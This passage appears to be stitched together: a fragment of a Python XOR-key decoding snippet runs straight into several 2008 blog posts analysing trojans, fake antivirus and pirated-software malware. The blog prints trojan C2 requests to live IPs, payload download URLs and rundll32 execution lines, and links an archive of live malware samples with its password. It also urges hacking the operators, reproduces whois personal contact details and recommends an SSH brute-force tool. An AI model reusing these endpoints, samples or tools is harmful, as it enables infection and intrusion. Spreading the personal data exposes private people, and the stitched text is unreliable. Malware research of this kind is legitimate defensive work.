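    print(f"recovered key 0x{result['key']:02X}, ambiguous={result['ambiguous']}")
    for name in result["names"]:
        print("   ", name)
```

Scoring the concatenation of all strings rather than each one alone is what makes the brute force reliable: a single short name such as "ntdll.dll" could decode into plausible letters under more than one key, but the digits and dots in "kernel32.dll" rule those keys out once the whole set is scored together. The `ambiguous` flag is the check an analyst should look at before trusting the output on a small sample.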
This is professional code injection using thread contexts; it teaches us that the guys "in the wild" have learned more than just CreateRemoteThread!!!<br /><br />It seems that this version relates to burimilol.com, which is unknown to "Norton Safe Web" (yeah, right): https://safeweb.norton.com/report/show?name=burimilol.com, but its older variant, "burimilol.net", is known: https://safeweb.norton.com/report/show?name=burimilol.net<br />What separates us from the criminals is the "protected domain services", which are mostly used by criminals... again no internet cops :)<br /><br />Now it executes itself! It parses its duplicate's PE headers and sections and injects code into it!<br />Then it drops a hidden exe in %windir% (c:\windows) called fxstaller.exe (48kb), which this time has a JPG icon in both the 32x32 and the 16x16 sizes :)<br /><br /><a href="http://1.bp.blogspot.com/_18YBLFP2tdA/SRt54ibNVJI/AAAAAAAAAD8/BJnFLGeQzTI/s1600-h/avs3fxinstaller.JPG"><img src="http://1.bp.blogspot.com/_18YBLFP2tdA/SRt54ibNVJI/AAAAAAAAAD8/BJnFLGeQzTI/s400/avs3fxinstaller.JPG" alt="" id="BLOGGER_PHOTO_ID_5267938201360487570" /></a><br /><br />This exe drops/downloads image.exe (48kb) into a new temp folder in %temp%<br /><br /><a href="http://1.bp.blogspot.com/_18YBLFP2tdA/SRt6MKmDvJI/AAAAAAAAAEE/bQfjBhbyKzQ/s1600-h/avs4image.JPG"><img src="http://1.bp.blogspot.com/_18YBLFP2tdA/SRt6MKmDvJI/AAAAAAAAAEE/bQfjBhbyKzQ/s400/avs4image.JPG" alt="" id="BLOGGER_PHOTO_ID_5267938538560928914" /></a><br /><br />These results are creepy!!! I guess Dr.Web also failed, and there is no one left to trust but Microsoft!<br />Then service.exe (144kb) is dropped at %windir%\system32\service.exe, a hidden file with a Darth Vader icon :)<br /><a href="http://3.bp.blogspot.com/_18YBLFP2tdA/SRt6mZr8oUI/AAAAAAAAAEM/cW2HwYDyiQ4/s1600-h/avs5service.JPG"><img src="http://3.bp.blogspot.com/_18YBLFP2tdA/SRt6mZr8oUI/AAAAAAAAAEM/cW2HwYDyiQ4/s400/avs5service.JPG" alt="" id="BLOGGER_PHOTO_ID_5267938989288759618" /></a><br /><br />This exe of darkness downloads and executes a file to c:\msn.exe<br /><br /><br />Now some deeper information, for the researchers among us. Why is their URL not blocked?! 
Because they are tricky!!!<br />They "try" to download http://www.freewebtown.com/tatrusa/test2.jpg, which redirects to<br />http://fwt.txdnl.com/6-40/t/a/tatrusa/test2.jpg<br />Then it requests:<br /><pre>
GET /cn?sid=40545F5A4F1F545B365C365836085B51363A0C1B1F000A0C4939080A02495B4F0A000D542F5C2B282F2D5A5C5A2D5E2C5D5A5B282B2B5E582C5F5151592D2C515D2A5A5A4F081D544F131854594F1D1954594F080F0F000D54585F515D51504F04061B1901000D5408075B0E4F1B0C1F000D54505C505B692901 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: 85.17.166.233
</pre><br />And gets:<br /><pre>
HTTP/1.1 200 OK
Date: Thu, 13 Nov 2008 00:04:56 GMT
Server: Apache/2.0.61 (FreeBSD) PHP/5.2.3 with Suhosin-Patch mod_fastcgi/2.4.2
Set-Cookie: sid=EE1DDFD5947B45F595556BD6D7E9C1A7; expires=Sat, 07-Nov-2009 19:04:56 GMT

g_InstallDll: http://77.93.75.153/img/upd.dll
Content-Length: 127
Connection: close
Content-Type: text/html

34034a4615431643424540474651151e4a4640445116034a354344403134363435464641464633333543454346414f434f4e3431313131315104114a047743
</pre><br />Then it sends stuff about me, to get the commands for this cool trojan!<br /><pre>
POST / HTTP/1.1
g_Version: 1156
g_ClientGUID: ,`Xc,q!`!q-Kk!JcXX-yK9NNGqKNk=!!
g_UID: Xk!-,=c=Xyy9yyqqXkJky9NkNh=,,,,,
g_SetID: [QJx
g_AffiliateID: y9NkNh
g_ResourceID: MnOM
g_URL: 8

g_Client: .Sf"yhJ:y9N:y!y:9` %?[H[Q]F:FBxFf@8/FQ"`:y:J9GGg)O?BFVO S[VE Ji8.K"-:G:`-!G:y!8vR"^yJG8Z}V"|OW?Om8*) uOxFfUO?On U}" =?}m8rc="GG^G!^aa^NG^`9^Gk8*K [VV}]QUf"0S*S!p[IO"f[n[f)rvSp[IO"f[n[fb8 =?}m86Wn"GGGGGkGh>#GGGGGkGq8p]IWO? }a H?}VOff}?f" y8.f_fO?cnIFQ" 1Of8o)]VV=}QQ"QOBO?o=}QQ"QOBO?o=}QQp]I"Go,FAO" ="z/.pq*/)zf~fUOI!JzQQQAPFF.:nAAo.QF fFMO" !kkoqOaX?}mfO?"D="zS?}x?[I ,FAOfz.QUO?QOU KYHA}?O?z.KeSZ*uK:KeKD ^Q}'}IOoqOfEU}H)~fUOI"qOfEU}Ho
g_GZipSupported: U?]O
g_RevID: h9J-
g_First: y
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: bescoro.com
Content-Length: 37
Cache-Control: no-cache

)vcv.)v.=) 0%nDDn@%r}MFAA[|FfU}?~" @b
</pre><br />And gets:<br /><pre>
HTTP/1.1 200 Ok
Server: nginx/0.5.35
Date: Thu, 13 Nov 2008 00:05:26 GMT
Content-Type: text/html; charset=iso-8859-1
Connection: close
Pragma: No-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 219
Content-Language: en
Set-Cookie: uid=Xk!-,=c=Xyy9yyqqXkJky9NkNh=,,,,,; expires=Mon, 09-Dec-2007 13:46:00 GMT
Set-Cookie: guid=,`Xc,q!`!q-Kk!JcXX-yK9NNGqKNk=!!; expires=Mon, 09-Dec-2007 13:46:00 GMT
Set-Cookie: cn=y; expires=Mon, 09-Dec-2007 13:46:00 GMT
Location:
Test: [B[FA
g_AdCategory: )}IO
g_ConnectionPerDay: k
g_MaxCategoryAppearances:
g_Popup: U?]O
g_PopupPerDay: yGy
g_RSD: 'UUH"88}WFOWO:V}I8x}88o'UUH"88nO?}]fUF:V}I8x}88o
g_RedirectServers: 'UUH"88NJ:hN:J!`:!`8x}88o'UUH"88N`:y-:y99:y-G8x}88o'UUH"88N!:ykh:yy`:ykN8x}88o
g_RevFlag: G
g_ServerIPs: gWOfV}?}:V}I"NGigNh:yNN:y9:!9"NGigN!:ykh:yy`:yk-"NGi
g_SetIDWas: _Q?OAO[fOn
g_StatisticsUploadDelay: y
g_StealFocus: a[AfO
g_UID: Xk!-,=c=Xyy9yyqqXkJky9NkNh=,,,,,
g_URL: 8

Y.r.r..G.....=......Q..|$u..kM.+`.......u..-.L..7...7{G.
.w.=.(r...%.......u........NsGD.a.2...g.d....I.6..:T.............R.L_......$6.G.......RZeZ>
+=/~..`Y. ........B........X
..'.a.b..7...O>n.i..Y.._9_%.
...qre../.p.
</pre><br />Then it "tries" to download http://www.freewebtown.com/tatrusa/oos.jpg and is again redirected to: http://fwt.txdnl.com/6-40/t/a/tatrusa/oos.jpg<br />Then it downloads http://www.j2arts.com/images/msn.exe to c:\msn.exe<br />From here on it looks like the same old-tech viruses (keyloggers and the classics; I don't have time for these files.....):<br />rundll32.exe C:\WINDOWS\system32\vtUolLBS.dll,a (vtUolLBS == random name)<br />rundll32.exe C:\WINDOWS\system32\nnnljiiI.dll,c<br />rundll32.exe C:\WINDOWS\system32\iifgHbyY.dll,a<br /><br />So let's summarize!<br /><br /><span style="font-weight: bold;">Evil hosts:</span><br />burimilol.net<br />burimilol.com<br />www.j2arts.com<br />www.freewebtown.com<br />fwt.txdnl.com<br />bescoro.com<br />77.93.75.153<br />85.17.166.233<br /><br />The AV vendors should receive my scanned files from VirusTotal.<br />I will also make an exception on this one and upload a sample of all the involved executables!<br />http://www.linkstofiles.com/MSNWorm.rar<br />archive password: "virus"<br /><br />Stop them, sue them, blacklist them, hack them, they are stealing from all of us!<br />Fight for digital law enforcement!!!<br /><br /><span style="font-weight: bold;">Pen-Tests in 2008 and Why don't you crack ssh?</span> (2008-10-28)<br /><br />I did a pen-test lately for a medium-sized American firm, and it seems the number of public remote exploits for devices such as Juniper, Netopia, Cisco (telnet) and default Linux services has gone down to as low as one or two for each since 2004.<br /><br />Since any respectable firm has Windows Update turned on, and Fedora-style Linux distributions also have automatic updates, I came to the conclusion that the cycle of:<br />Safe --> Research --> Exploit --> Public Disclosure --> Patch --> Automatic Update 
--> Safe<br />results in Black-Box Penetration Testers not having much to show the client except configuration errors, a few user enumerations and less critical stuff that doesn't get fixed by the vendors.<br /><br />The solution would be for pen-testers to find their own exploits. That is why in the last years most of the tools written are fuzzers.<br />Cisco, Netopia, Juniper and Linux services were already fuzzed like hell before they were shipped to clients, so this doesn't seem to be a good approach to the problem.<br /><br />My suggestions:<br />1) If you are a pen-tester, research and discover your own vulnerabilities and create workarounds for them, show them to your client and keep them to yourself!<br />2) If you are a researcher, supply a working P.O.C, because pen-testers don't have time to buy that machine and develop a working shellcode for your vulnerability<br /><br /><span style="font-weight: bold; text-decoration: underline;color:red;" >Being 13 hops away from the machines I had been pen-testing</span>, I was amazed to see that products which are extremely mainstream and trusted fail at such a simple task.<br />I used Nmap to scan the network range (of course with -P0, or -PN in the new version) and just two HTTP servers were discovered on 8 hosts; as I am not a big fan of Nmap, I returned to what I was using in the past, GFI LANguard.<br /><br />I scanned the targets using GFI LANguard (which is a great tool when used inside local networks) with a complete TCP and UDP port scan, a 20 second TCP timeout and an 8 second UDP timeout; these timeouts are EXTREME and should achieve the most accurate results. The scan results were very poor, detecting about 3 open ports on 8 machines!!! Of course I checked that nothing else was running on my internet connection, to make sure this was just a bad dream. I scanned again and one more port was discovered: SSH!<br /><br />I decided this could not be true and returned to Nmap using the "slow and intensive" scan; the results were better, about 5 TCP ports and 1 SNMP, but I thought, "still no way that is all they've got!"<br /><br />Finally, I installed the latest version of Nessus (Tenable Nessus 3), configured it with high timeouts and ran the scan. The results were AMAZING!!! It didn't miss anything the other scanners had found, and it discovered 15 more UDP ports and 7 more TCP ports. From now on I am only scanning with Nessus; my time is worth it!<br /><br />Now that I had some interesting services to attack, I wanted to try and log into one of the Linux machines using SSH. To me it sounded simple: "I will download a dictionary/brute force SSH tool and that's it". Apparently not!<br />There is an ancient Perl script running all across the web to do SSH and "expect", THAT-IS-LAME. Some guy really agreed with that and wrote a Ruby script that uses the Net::SSH lib to automate attempts, quite similar to Tim's SSHatter Perl script; that is nice, but still no multithreading support.<br />Of course you may think "Why not use THC Hydra?"; the answer would be that by default it's not configured to be compiled with libssh, and you have to get some libs; you will burn a few hours making it work!<br /><br />My dear friend "Kiril Nesenko", AKA "axi1es", wrote for YOU guys the script for "The Common Lazy Fedora Guy", which will download Hydra, the SSH and other libs, configure and compile it, and execute Hydra, all automatically. Enjoy! :)<br /><a href="http://www.linkstofiles.com/install_hydra-5.4-src+ssh.sh">http://www.linkstofiles.com/install_hydra-5.4-src+ssh.sh</a><br /><br /><span style="font-weight: bold;">Automated spreading of malware through vBulletin forums</span> (2008-09-15)<br /><br />Where would it be better to attack than where all the people trust each other?<br />A single individual or a group of individuals, whose tracks lead to Turkish people and Chinese hosting or Chinese partners, is spreading viruses through infected files and setup installations shared in vBulletin forums. It seems these individuals have a registration bot with a CAPTCHA bypass mechanism for vBulletin 3.7.xx versions (maybe other versions too) and they are using it to spread all kinds of malware.<br /><br />I first found this when examining another Kaspersky 2009 installation located at:<br />http://www.httpshare.net/%E4%E5%F8%E3%E5%FA-%FA%E5%EB%F0%E5%FA-%7C-software-download/427522-kaspersky-antivirus-2009-full-34-p-ece-test-key-no-problem.html<br /><br />The username spreading this message is "hakan_72_123", and with a simple Google search we can see:<br />http://www.google.com/search?hl=en&amp;client=firefox-a&amp;rls=org.mozilla%3Ahe%3Aofficial&amp;hs=sgc&amp;q=hakan_72_123&amp;btnG=Search<br /><br />Hakan is not very shy about using the bot with his own name; go figure, maybe he is infecting thousands of forums manually?!<br />Anyway, he is at www.vbhackers.com/members/hakan_72_123/, which explains a lot :)<br /><br />So what did he do? He took the time to upload Kaspersky 2009 to<br />http://rapidshare.com/files/115362254/Kaspersky_2009_Full_Sueruem_by_hakan.rar<br /><br />Well, I just checked, and it has been 2 months since I found it and the bad guy has extended the business to torrents too; this is the same virus under the title "Kaspersky Antivirus 2009 Full + Key [App][www.zonatorrent.com] ":<br />http://isohunt.com/download/44622492/kaspersky.torrent<br /><br />Inside the rar there is a txt file with the following text (translated from Turkish):<br /><blockquote>1- The program is not a demo, it is the full version.<br /><br />2- To enter the key, follow these steps:<br />license-merge-activate using key-browse= from here select the folder<br />you extracted the keys into, double-click the bottom one in the list<br />and enter the key.<br /><br /> PREPARED BY: Hakan<br /><br /> www.avrasyaforum.net</blockquote>What they did is, instead of the standard shared .msi file, they put up a WinRAR self-extracting archive with the icon of an msi file. They made the archive so that WinRAR's shell extension doesn't recognize it as extractable. 
Once executed, it drops a file called svchost.exe in "%ProgramFiles%\Outlook Express\", which is a refreshing path to drop a trojan downloader in :)<br />It executes the svchost.exe (compressed with MiniPE), which then executes the trojan downloaded to %temp%\wmoptimizer.dll using rundll32.exe:<br /><blockquote>rundll32.exe "%temp%\wmoptimizer.dll", RunSetup_Install</blockquote>svchost.exe uses the classic URLDownloadToFileW and ShellExecuteW to download and execute: http://loansquotesinsurance.com/f/Resident.bin<br /><br />This is the whois information for http://loansquotesinsurance.com:<blockquote>Registration Service Provided By: Chinese DQ Network Tech Corp.<br />Contact: xixipai@hotmail.com<br /> <br />Domain name: loansquotesinsurance.com<br /><br />Registrant Contact:<br /> Shawn Lee<br /> Shawn Lee<br /> <br /> B-902,Zhongxing Huayuan,No.1102,Zhongshan Dadao,Tianhe Distr<br /> Guang Zhou, Guangdong 510660<br /> CN<br /><br />Administrative Contact:<br /> Shawn Lee<br /> Shawn Lee (webmasters@loansquotesinsurance.com)<br /> +86.02033875805<br /> Fax: +86.02033875805<br /> B-902,Zhongxing Huayuan,No.1102,Zhongshan Dadao,Tianhe Distr<br /> Guang Zhou, Guangdong 510660<br /> CN<br /><br />Technical Contact:<br /> Shawn Lee<br /> Shawn Lee (webmasters@loansquotesinsurance.com)<br /> +86.02033875805<br /> Fax: +86.02033875805<br /> B-902,Zhongxing Huayuan,No.1102,Zhongshan Dadao,Tianhe Distr<br /> Guang Zhou, Guangdong 510660<br /> CN</blockquote>The email xixipai@hotmail.com also registers "http://3290.com":<br /><br /><blockquote>Registration Service Provided By: Chinese DQ Network Tech Corp.<br />Contact: xixipai@hotmail.com<br /><br />Domain name: 3290.com<br /><br />Administrative Contact:<br /> Chinese DQ Network Tech Corp.<br /> Ren XiaoFeng (xixipai@hotmail.com)<br /> +1.05306260800<br /> Fax: +299.05306260803<br /> ZhongHuaDonglu 1038hao<br /> HeZe, 274000<br /> CN<br /><br />Technical Contact:<br /> Chinese DQ Network Tech Corp.<br /> Ren XiaoFeng (xixipai@hotmail.com)<br /> +1.05306260800<br /> Fax: +299.05306260803<br /> ZhongHuaDonglu 1038hao<br /> HeZe, 274000<br /> CN<br /><br />Registrant Contact:<br /> Chinese DQ Network Tech Corp.<br /> Ren XiaoFeng<br /> <br /> ZhongHuaDonglu 1038hao<br /> HeZe, 274000<br /> CN</blockquote>Well, this is the part where I can only say: if you are reading this and are in some kind of cyber police, DO SOMETHING!!!<br /><br /><span style="font-weight: bold;">Keylogger Running Under Kaspersky 2009</span> (2008-09-15)<br /><br />The last posts clearly show what is already well known: static virus detection is not something AV vendors do well enough. Now this one is quite a story. As I was researching many trojans, I was moving files into and out of the Virtual PC machine I use to test viruses. My computer has Kaspersky 2009 installed and running with maximum security settings (including protection against keyloggers and kernel object modifications).<br /><br />I accidentally executed on my host PC, without noticing, one of the samples I was testing in the VM. I was using my computer as usual when I began noticing some kind of tiny delays when typing a lot of text, the kind of delays I experienced when I wrote my first keylogger. 
I was completely surprised to have this suspicion, since I felt "almost safe" with my Kaspersky 2009 updating every 4 hours.<br /><br />Opening "Process Explorer", I began examining the running processes and noticed some weird DLL files loaded in all my processes:<br />kbdth2sys.dll<br />kbdvntcapi.dll<br />They were in system32, and these are the AV test results for these 2 files today (also 2 months ago):<br /><a href="http://1.bp.blogspot.com/_18YBLFP2tdA/SM5-WlnWv-I/AAAAAAAAACM/VoW5Pielgwg/s1600-h/anaylsispic.JPG"><img src="http://1.bp.blogspot.com/_18YBLFP2tdA/SM5-WlnWv-I/AAAAAAAAACM/VoW5Pielgwg/s400/anaylsispic.JPG" alt="" id="BLOGGER_PHOTO_ID_5246269542452608994" /></a><br /><br />I was surprised by two things:<br />1) Kaspersky's Anti-Keylogger "live protection" let all my personal information be compromised<br />2) Symantec was the only AV really detecting this, and as a keylogger, which is very funny because their AV is a joke; I will write a few posts about that later<br /><br />I can't believe this! I am now uploading the files again to VirusTotal to see the updated scan results for today, and I notice this:<br /><br /><a href="http://2.bp.blogspot.com/_18YBLFP2tdA/SM6BEBydL6I/AAAAAAAAACU/9F2VQeHLDoA/s1600-h/getthis.JPG"><img src="http://2.bp.blogspot.com/_18YBLFP2tdA/SM6BEBydL6I/AAAAAAAAACU/9F2VQeHLDoA/s400/getthis.JPG" alt="" id="BLOGGER_PHOTO_ID_5246272522132729762" /></a><br /><br />The file was first received by VirusTotal on 2007.10.23, which is almost 2 years ago!!!!!!!!!<br />This only proves 3 things:<br />1) The malicious code writers WERE INDEED using VirusTotal's "don't distribute samples to AV vendors" option, which was lately removed!<br />2) All anti-viruses failed to detect this widespread keylogger, which has been used to steal people's information, for THE LAST TWO YEARS!!!<br />3) It's better to write keyloggers in Delphi ;)<br /><br />I hereby thank the creator of the matrix for letting me find it on my PC after just 2 days.<br />Here are today's results for kbdth2sys.dll:<br />http://www.virustotal.com/en/analisis/ae172aaf34a59733d149476e4b4bcb9c<br /><a href="http://4.bp.blogspot.com/_18YBLFP2tdA/SM6FAnZlVnI/AAAAAAAAACc/Sk1ffWMKjIY/s1600-h/today.JPG"><img src="http://4.bp.blogspot.com/_18YBLFP2tdA/SM6FAnZlVnI/AAAAAAAAACc/Sk1ffWMKjIY/s400/today.JPG" alt="" id="BLOGGER_PHOTO_ID_5246276861555988082" /></a><br /><br />So after 2 YEARS of it being undetected, and 2 MONTHS after the AV vendors got my uploaded samples, we get this 
amazing 10 of 36 result which leaves it undetected for: Kaspersky, DrWeb, McAfee, BitDefender, Microsoft, Panda, F-Secure, Fortinet and others...<br /><br />As for <span id="status_nombre">kbdvntcapi.dll after all this, detection hasn't really changed, 4 huristic decetions and 1 symantec keylogger detection, still a sad story (at least for most people :)</span><br />http://www.virustotal.com/he/analisis/d51626cb8f0b04219b0ad4c010036f0d<br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_18YBLFP2tdA/SM6JGawvskI/AAAAAAAAACk/3mgCAcDx3dg/s1600-h/capi.JPG"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer;" src="http://1.bp.blogspot.com/_18YBLFP2tdA/SM6JGawvskI/AAAAAAAAACk/3mgCAcDx3dg/s400/capi.JPG" alt="" id="BLOGGER_PHOTO_ID_5246281359289201218" border="0" /></a><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br />Well, I uninstalled my kaspersky 2009 :)Rafel Ivgihttp://www.blogger.com/profile/10296831179799063154noreply@blogger.com0tag:blogger.com,1999:blog-9114770521689436630.post-56196429228842390432008-09-15T06:58:00.000-07:002008-09-15T07:54:44.041-07:00AVs fail AgainLately I have seen many web downloads, some at forums and some at rapidshare and also a few torrents such as "Adobe Acrobat 9" that include installation and a crack.<br />The installation or crack is in a password protected rar file that in order to get the password, one must run the supplyed tool called "XXX Password Generator".<br /><br />This installs another variant of the AntiVirus 2008, I can truely say I can't tell anymore if it comes from the same guys, ok of course it's them but there is just no way they got so much man power to write so many completely different versions!!!<br />Here are the websites it pops up to purchase from:<br /><br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" 
href="http://1.bp.blogspot.com/_18YBLFP2tdA/SM5xR1RZj9I/AAAAAAAAABs/whxN6pF9AKE/s1600-h/1.JPG"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer;" src="http://1.bp.blogspot.com/_18YBLFP2tdA/SM5xR1RZj9I/AAAAAAAAABs/whxN6pF9AKE/s400/1.JPG" alt="" id="BLOGGER_PHOTO_ID_5246255167104978898" border="0" /></a><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_18YBLFP2tdA/SM5xSAkHmYI/AAAAAAAAAB0/D6jgyAVQCT8/s1600-h/2.JPG"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer;" src="http://4.bp.blogspot.com/_18YBLFP2tdA/SM5xSAkHmYI/AAAAAAAAAB0/D6jgyAVQCT8/s400/2.JPG" alt="" id="BLOGGER_PHOTO_ID_5246255170136283522" border="0" /></a><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_18YBLFP2tdA/SM5xSSSUjOI/AAAAAAAAAB8/nm5noC3lhbM/s1600-h/3.JPG"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer;" src="http://2.bp.blogspot.com/_18YBLFP2tdA/SM5xSSSUjOI/AAAAAAAAAB8/nm5noC3lhbM/s400/3.JPG" alt="" id="BLOGGER_PHOTO_ID_5246255174893472994" border="0" /></a><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_18YBLFP2tdA/SM5xSR6btGI/AAAAAAAAACE/sgHv3tKwF1U/s1600-h/screenshot4.JPG"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer;" src="http://1.bp.blogspot.com/_18YBLFP2tdA/SM5xSR6btGI/AAAAAAAAACE/sgHv3tKwF1U/s400/screenshot4.JPG" alt="" id="BLOGGER_PHOTO_ID_5246255174793278562" border="0" /></a><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br />Installs executables at:<br />%ProgramFiles%\Antivirus 2008\Antivirus-2008.exe<br 
/>which is today detected by 24 of 36 AV vendors<br />http://www.virustotal.com/en/analisis/5ca67e83d763a44d2719de3c40ab0086<br /><br />This virus adds a scary DANGER! iframe to your desktop.htt, who would remove this for you? <blockquote><\div style="position: absolute; left: 0pt; top: 0pt; width: 1280px; height: 836px;"><br /><\img src="file:///C:/WINDOWS/web/wallpaper/Bliss.bmp" cache="" style="position: absolute; left: 0pt; top: 0pt; width: 100%; height: 100%;" /><br /><br /><\iframe id="1" marginwidth="0" marginheight="0" name="DeskMovrW" src="file:///C:%5CWINDOWS%5Cprivacy_danger%5Cindex.htm" resizeable="XY" subscribed_url="" style="background: transparent none repeat scroll 0% 0%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; position: absolute; left: 0pt; top: 0pt; width: 1280px; height: 806px; z-index: 0;" frameborder="0"> </blockquote>It installed some dlls and executables which are very known to AVs:<br />http://www.virustotal.com/en/analisis/3ed55959b67a666973798fa0c35f23f5<br />http://www.virustotal.com/en/analisis/c44ccd7ef6b11f700a52042bdb09057f<br />http://www.virustotal.com/en/analisis/ee13a4586807956432b3989534febf60<br />http://www.virustotal.com/en/analisis/2af01563b34916780ac23799ec1368df<br />http://www.virustotal.com/en/analisis/0e309871a713b62a6e68a0071ac54b06<br />http://www.virustotal.com/en/analisis/1f5371eb356e9c893c3dbec8b496641b<br />http://www.virustotal.com/en/analisis/0d012def38cd3adfe5ada8d7c45b3041<br />http://www.virustotal.com/en/analisis/0d9eacd2a5c15fb03a91f2b044000bc3<br />http://www.virustotal.com/en/analisis/bbef207525a04ba4152509a1e458d1e4<br /><br />There is as another variant I found called "AntiMalwareGuard_Free.exe" packed with PECompact 2.xx, this is considered detected relatevly to the other variants 19 of 36 AV vendors detect it.<br />http://www.virustotal.com/en/analisis/c0b7c0498a9b0f684f9e3cbbcc0e5b53<br /><br />So where is the problem???<br 
/><span style="font-weight: bold;">The Trojan Downloader itself wasn't detected by any vendor, and now, 2 months after</span> I found it (which means<span style="font-weight: bold;"> the vendors got the samples from my virustotal file upload</span> 2 months ago), it is detected by only 15 AV vendors!!!<br />http://www.virustotal.com/he/analisis/a38ab04057b44c6bd870ef0446a19a5e<br /><span style="font-weight: bold;">Kaspersky! McAfee! TrendMicro! Panda! F-Secure! Fortinet! Where are you people?!?!?!?!</span><br /><br /><span style="font-size:130%;"><span style="font-weight: bold;">The malicious guys have no problem replacing the executables at the server side to avoid detection; they even have the manpower to write completely new ones.</span></span><br /><br /><span style="font-weight: bold;">Google fooled by the "Fake Anti-Virus Virus"</span> (Rafel Ivgi, 2008-09-15)<br />You probably know by now about the fake Anti-Virus that is planted everywhere to fool people into buying it; go figure, maybe it will self-update some day and start stealing bank accounts...<br />I can't believe we have come to this point where it is so widespread and has so many different domains and versions and nobody stops them!!!<br />The internet needs some kind of global FBI to keep control over these criminals!!!<br />These guys operate from Russia and they are the "180 Solutions" team (I prove it below), which shows everyone that a criminal business on the internet is profitable and has grown over the last 5 years, at least if it's running from a country safe for cyber criminals (Russia!!!)<br /><br />This is a wide viral network and they check for the existence of any of their products; I saved the list of Internet Explorer blocked/trusted entries they look for here: http://theinsider.deep-ice.com/evilnetwork.txt<br /><br />So they infect us through cracks and software 
installations (fake setups, SFX, exe binding), p2p (torrent, eMule) and of course OS and browser exploits through warez websites.<br />Still, something is missing... it's working too well this time! Well, get this!!<br /><br />Please join my experiment: let's assume someone just opens Google and wants to download the mp3 of the Sopranos T.V. series titled "you got yourself a gun", so he should search "download mp3 sopranos got yourself a gun". You can test it yourself:<br /><br />http://www.google.com/search?hl=iw&amp;client=firefox-a&amp;rls=org.mozilla%3Ahe%3Aofficial&amp;hs=X1V&amp;q=download+mp3+sopranos+got+yourself+a+gun&amp;btnG=%D7%97%D7%99%D7%A4%D7%95%D7%A9&amp;meta=<br /><br />Last week result number three was:<br /><blockquote>Sopranos Theme Song<br />You woke up this morning Got yourself a gun, Complete Guide to Entertaining - Sopranos Stile! Entertaining with The Sopranos May 25, 2008 Download Sopranos ...<br />www.geocities.com/owhfmqhoqxu/sopranos-theme-song.html - 13k</blockquote><br />Now result number six is:<br /><blockquote>mas woemns rights woems woemsn bottle opener woen woen am woen of ...<br />... up this morning got yourself a woke up this morning got yourself a gun woke ... 
sopranos woke up this morning mp3 woke up this morning mp3 sopranos woke ...<br />http://hauton.net/2/2289/ - 35k</blockquote>One can clearly see that last week's result is very, very convincing, and the new one is also similar to the way a warez/mp3 website would appear in Google; this leads directly to a page with an auto-download offer of this fraud virus.<br /><br />1) Why isn't this blocked by Google, who "maps all the evil pages in the world"?!<br />2) The Google search engine is helping the bad guys publish their virus in the top 10 results!<br /><br />This issue goes way beyond searching for downloads, I even got it searching for people:<br />http://vivocurtindo.com.br/galeriaa/css/_images/toyota-tazz-wiring/&lt;my_searched_keyword1&gt;-&lt;my_searched_keyword2&gt;-home.html<br /><br />This viral network is so large I truly believe only government power can stop it.<br />They use endless domains to spread this virus.<br /><br />B.t.w., it's extremely intelligent to create a "virus not considered as a virus" and spread it as fraud software which no law enforcement cares about, and then, once it's planted in millions of computers, just update it to steal what you want and then even change it back... a combination of a breach in the law and in the way viruses are treated by the AV industry.<br /><br /><span style="font-weight: bold;">SO Common and yet EVIL goes free :)</span> (Rafel Ivgi, 2008-09-13)<br />Before I start this one, I must say I never thought of myself as a blogger.<br />I was always reading other people's blogs thinking they try to be the "I am cool, I have a blog" kind of people. Well, I just think the malicious stuff I see every day should be shared with YOU :)<br /><br />At these times, torrents are the world's most active network for file sharing. The current Windows version is always one of the most shared files and therefore crime follows there :)<br /><br />I recently decided to put it to the test and downloaded the most "seeded" file I found, which was "Windows XP Pro.Corp. Edition SP3 June 2008 Update + SATA Driver"; this is still one of the most shared files. Of course I scanned it using the latest fully updated versions of Kaspersky 2009 and Dr.Web which, according to my test, are currently the best detectors on the market. Well, nothing was found...<br /><br />So I load the iso, the AutoRun executes and I just "feel" something is wrong!! 
I look at Process Explorer and I see a process called "file.exe"... hmmmmm....<br />I figured out that the bad guys replaced the original "setup.exe" with a silent self-extracting WinRar installer carrying the original setup icon; it extracts a Trojan Downloader called file.exe and the original setup.exe to the temp directory and executes both the Trojan and the original setup (with CurrentDirectory set to the WinRar install path).<br /><br />Here is a scan of the malicious "setup.exe" installer (today, 2 months after I found this):<br /><br /><a href="http://1.bp.blogspot.com/_18YBLFP2tdA/SMw-RS9pNLI/AAAAAAAAAA0/u1pF2X1h96M/s1600-h/antiviruses.JPG"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer;" src="http://1.bp.blogspot.com/_18YBLFP2tdA/SMw-RS9pNLI/AAAAAAAAAA0/u1pF2X1h96M/s400/antiviruses.JPG" alt="" id="BLOGGER_PHOTO_ID_5245636132848874674" border="0" /></a><br /><p><br />I said O.K., maybe they didn't go through the trouble of marking the "Installer", but they did all detect the Trojan Downloader, right?<br /></p><br /><a href="http://2.bp.blogspot.com/_18YBLFP2tdA/SMw_wuiRZ_I/AAAAAAAAAA8/FeZLU07Vb3E/s1600-h/antiviruses2.JPG"><img style="margin: 0pt 10px 10px 